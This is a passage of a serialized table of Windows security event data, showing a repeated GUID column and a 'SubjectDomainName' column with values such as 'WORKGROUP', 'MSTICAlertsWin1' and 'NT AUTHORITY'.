-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\",\"263a788b-6526-4cdc-8ed9-d79402fe4aa0\"],\"SubjectDomainName\":[\"NaN\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"NT AUTHORITY\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"MSTICAlertsWin1\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"NT AUTHORITY\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGROUP\",\"WORKGR